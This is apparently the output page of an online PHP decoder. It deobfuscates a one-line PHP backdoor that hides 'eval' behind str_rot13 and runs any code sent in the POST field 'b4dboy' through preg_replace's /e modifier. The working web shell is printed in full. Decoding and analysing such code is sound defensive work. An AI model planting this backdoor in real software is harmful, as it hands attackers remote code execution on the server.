Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4d..
Decoded Output download
<?php
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
?>
Did this file decode correctly?
Original Code
<?php
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
?>
Function Calls
str_rot13 | 1 |
preg_replace | 1 |
Stats
MD5 | cc10a1b1a3d464d53152d8f026664c57 |
Eval Count | 1 |
Decode Time | 109 ms |